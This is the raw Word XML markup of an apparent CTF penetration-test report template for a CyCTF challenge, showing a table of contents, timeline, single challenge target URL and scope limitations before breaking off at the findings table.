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Theme="minorHAnsi" w:hAnsi="Calibri" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-201360411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EF91FFE" w14:textId="709CA1F0" w:rsidR="009415E7" w:rsidRDefault="009415E7">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="06A1009B" w14:textId="1F9FC928" w:rsidR="00DF2734" w:rsidRDefault="009415E7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8314204" w:history="1">
            <w:r w:rsidR="00DF2734" w:rsidRPr="00F42E0E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="00DF2734">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DF2734" w:rsidRPr="00F42E0E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scope of Work</w:t>
            </w:r>
            <w:r w:rsidR="00DF2734">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DF2734">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DF2734">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc188314204 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DF2734">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DF2734">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DF2734">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00DF2734">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69A0E70A" w14:textId="1329E969" w:rsidR="00DF2734" w:rsidRDefault="00DF273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188314205" w:history="1">
            <w:r w:rsidRPr="00F42E0E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F42E0E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>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_Toc188314205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C5554" w14:textId="3842413A" w:rsidR="00DF2734" w:rsidRDefault="00DF273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188314206" w:history="1">
            <w:r w:rsidRPr="00F42E0E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Cs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F42E0E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Targets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_Toc188314206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26A88" w14:textId="022D1543" w:rsidR="00DF2734" w:rsidRDefault="00DF273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188314207" w:history="1">
            <w:r w:rsidRPr="00F42E0E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szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F42E0E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>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_Toc188314207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DB646" w14:textId="71B38132" w:rsidR="00DF2734" w:rsidRDefault="00DF2734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188314208" w:history="1">
            <w:r w:rsidRPr="00F42E0E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</w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F42E0E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding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_Toc188314208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69796" w14:textId="6DBD089A" w:rsidR="00DF2734" w:rsidRDefault="00DF2734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188314209" w:history="1">
            <w:r w:rsidRPr="00F42E0E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</w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F42E0E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk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_Toc188314209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22E83" w14:textId="1EB084DE" w:rsidR="00DF2734" w:rsidRDefault="00DF2734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188314210" w:history="1">
            <w:r w:rsidRPr="00F42E0E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:rtl/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F42E0E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Potential Business Impact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_Toc188314210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F02FA" w14:textId="72007EBE" w:rsidR="00DF2734" w:rsidRDefault="00DF2734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188314211" w:history="1">
            <w:r w:rsidRPr="00F42E0E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Cs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F42E0E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Technical Vulnerabilities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_Toc188314211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1EAD0" w14:textId="2266EF7D" w:rsidR="00DF2734" w:rsidRDefault="00DF273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188314212" w:history="1">
            <w:r w:rsidRPr="00F42E0E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szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00705B66">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>privelege escalation to root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_Toc188314212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A1E08" w14:textId="60BEEE3A" w:rsidR="00DF2734" w:rsidRDefault="00DF2734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</w:p>
        <w:p w14:paraId="1E3C7A75" w14:textId="02FEE50A" w:rsidR="003579B4" w:rsidRPr="00234AC7" w:rsidRDefault="009415E7" w:rsidP="00234AC7">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2B19638F" w14:textId="0BE8A686" w:rsidR="00572521" w:rsidRPr="006D7270" w:rsidRDefault="00572521" w:rsidP="006D7270">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
          <w:b/>
          <w:caps/>
          <w:color w:val="FF2323"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc186041930"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="674AD292" w14:textId="77777777" w:rsidR="00514968" w:rsidRDefault="00514968" w:rsidP="00514968">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc186041932"/>
      <w:bookmarkStart w:id="2" w:name="_Toc188314204"/>
      <w:bookmarkStart w:id="3" w:name="_Toc186041931"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Scope of Work</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="3C7D14C3" w14:textId="77777777" w:rsidR="00514968" w:rsidRDefault="00514968" w:rsidP="00514968">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E75A5">
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">This section outlines the specific scope of the penetration testing, referred to throughout the document as the targeted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>application</w:t>
      </w:r>
      <w:r w:rsidRPr="006E75A5">
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259261FF" w14:textId="77777777" w:rsidR="00514968" w:rsidRPr="00B6471C" w:rsidRDefault="00514968" w:rsidP="00514968">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc186041933"/>
      <w:bookmarkStart w:id="5" w:name="_Toc188314205"/>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Timeline</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/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15"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="1255"/>
      </w:tblGrid>
      <w:tr w:rsidR="00514968" w14:paraId="6A1652E8" w14:textId="77777777" w:rsidTr="00B53F67">
        <w:trPr>
          <w:trHeight w:val="503"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A40000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BC62F5A" w14:textId="77777777" w:rsidR="00514968" w:rsidRPr="00B6471C" w:rsidRDefault="00514968" w:rsidP="00B53F67">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B6471C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A40000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D1386FA" w14:textId="77777777" w:rsidR="00514968" w:rsidRPr="00B6471C" w:rsidRDefault="00514968" w:rsidP="00B53F67">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B6471C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Start Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A40000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="712E2B9D" w14:textId="77777777" w:rsidR="00514968" w:rsidRPr="00B6471C" w:rsidRDefault="00514968" w:rsidP="00B53F67">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B6471C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>End Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A40000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="134C1D8D" w14:textId="77777777" w:rsidR="00514968" w:rsidRPr="00B6471C" w:rsidRDefault="00514968" w:rsidP="00B53F67">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Man-days</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514968" w14:paraId="584AEF15" w14:textId="77777777" w:rsidTr="00B53F67">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75778052" w14:textId="1F9A5042" w:rsidR="00514968" w:rsidRDefault="007E1517" w:rsidP="00B53F67">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>CyCTF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0482B52A" w14:textId="1DDC6DC9" w:rsidR="00514968" w:rsidRDefault="007E1517" w:rsidP="00B53F67">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>NOV</w:t>
            </w:r>
            <w:r w:rsidR="00514968" w:rsidRPr="00CE7A37">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007B3CD3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007B3CD3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>th</w:t>
            </w:r>
            <w:r w:rsidR="00514968" w:rsidRPr="00CE7A37">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>, 202</w:t>
            </w:r>
            <w:r w:rsidR="007B3CD3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="256CCAFA" w14:textId="0687FD48" w:rsidR="00514968" w:rsidRDefault="007E1517" w:rsidP="00B53F67">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>NOV</w:t>
            </w:r>
            <w:r w:rsidR="007B3CD3" w:rsidRPr="00CE7A37">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007B3CD3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>th</w:t>
            </w:r>
            <w:r w:rsidR="007B3CD3" w:rsidRPr="00CE7A37">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>, 202</w:t>
            </w:r>
            <w:r w:rsidR="007B3CD3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59B38D92" w14:textId="594D3750" w:rsidR="00514968" w:rsidRDefault="007E1517" w:rsidP="00B53F67">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DC2D8B0" w14:textId="77777777" w:rsidR="00514968" w:rsidRPr="00CC3A2C" w:rsidRDefault="00514968" w:rsidP="00514968">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46FFAC88" w14:textId="77777777" w:rsidR="00514968" w:rsidRDefault="00514968" w:rsidP="00514968">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc186041934"/>
      <w:bookmarkStart w:id="7" w:name="_Toc188314206"/>
      <w:r>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="598ABA04" w14:textId="172237CC" w:rsidR="00514968" w:rsidRPr="009907E1" w:rsidRDefault="00514968" w:rsidP="00514968">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">The below scope was </w:t>
      </w:r>
      <w:r w:rsidR="007E1517">
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>CyCTF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1075"/>
        <w:gridCol w:w="8275"/>
      </w:tblGrid>
      <w:tr w:rsidR="00514968" w14:paraId="6C009F55" w14:textId="77777777" w:rsidTr="00B53F67">
        <w:trPr>
          <w:trHeight w:val="431"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1075" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A40000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A0F18C6" w14:textId="77777777" w:rsidR="00514968" w:rsidRPr="00A86768" w:rsidRDefault="00514968" w:rsidP="00B53F67">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A86768">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8275" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A40000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70363E4A" w14:textId="77777777" w:rsidR="00514968" w:rsidRPr="00A86768" w:rsidRDefault="00514968" w:rsidP="00B53F67">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A86768">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Asset Identifier (URL/IP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514968" w14:paraId="3F462CF3" w14:textId="77777777" w:rsidTr="00B53F67">
        <w:trPr>
          <w:trHeight w:val="341"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1075" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EED62DB" w14:textId="77777777" w:rsidR="00514968" w:rsidRDefault="00514968" w:rsidP="00B53F67">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE7A37">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23F669D1" w14:textId="1EE3DC3D" w:rsidR="00514968" w:rsidRDefault="007E1517" w:rsidP="00B53F67">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="007E1517">
              <w:t>https://cyctf-4845ded1873e-escape-0-0.chals.io/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02373EB2" w14:textId="77777777" w:rsidR="00514968" w:rsidRDefault="00514968" w:rsidP="00514968">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C6CF308" w14:textId="77777777" w:rsidR="00514968" w:rsidRDefault="00514968" w:rsidP="00514968">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc186041935"/>
      <w:bookmarkStart w:id="9" w:name="_Toc188314207"/>
      <w:r>
        <w:t>Limitations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1AB42E83" w14:textId="77777777" w:rsidR="00514968" w:rsidRDefault="00514968" w:rsidP="00514968">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25AC5">
        <w:t xml:space="preserve">The findings in this report reflect the state of the </w:t>
      </w:r>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:r w:rsidRPr="00D25AC5">
        <w:t xml:space="preserve"> during a specific time frame. Changes to the architecture, code, or configurations could lead to different results if the test is repeated. This penetration test specifically does not include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFA959F" w14:textId="42F9358A" w:rsidR="00514968" w:rsidRDefault="00514968" w:rsidP="007E1517">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Distributed Denial of Service Attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4796EE5C" w14:textId="4BE57D71" w:rsidR="00B46D38" w:rsidRPr="00A817DF" w:rsidRDefault="007E1517" w:rsidP="00A817DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Altering any data in the system </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D80B33" w14:textId="77777777" w:rsidR="00A817DF" w:rsidRDefault="00A817DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:caps/>
          <w:color w:val="FF2323"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ADA1E9" w14:textId="04DD3F74" w:rsidR="006D7270" w:rsidRDefault="006D7270" w:rsidP="006D7270">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc188314208"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Finding Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="2829386B" w14:textId="01BCB094" w:rsidR="006D7270" w:rsidRDefault="006D7270" w:rsidP="006D7270">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A60D44">
        <w:t xml:space="preserve">The table below presents a high-level summary of the security vulnerabilities that have been successfully found and verified by </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00A60D44">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1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65"/>
        <w:gridCol w:w="5490"/>
        <w:gridCol w:w="2695"/>
      </w:tblGrid>
      <w:tr w:rsidR="006D7270" w14:paraId="6ED5DD5B" w14:textId="77777777" w:rsidTr="00825B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40000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5066335E" w14:textId="77777777" w:rsidR="006D7270" w:rsidRPr="00B549B1" w:rsidRDefault="006D7270" w:rsidP="00B53F67">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B549B1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5490" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A40000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BCD7676" w14:textId="77777777" w:rsidR="006D7270" w:rsidRPr="00B549B1" w:rsidRDefault="006D7270" w:rsidP="00B53F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FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B549B1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Vulnerability Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2695" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A40000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14467A7E" w14:textId="77777777" w:rsidR="006D7270" w:rsidRPr="00B549B1" w:rsidRDefault="006D7270" w:rsidP="00B53F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FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B549B1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D7270" w14:paraId="269EA106" w14:textId="77777777" w:rsidTr="001F09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FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
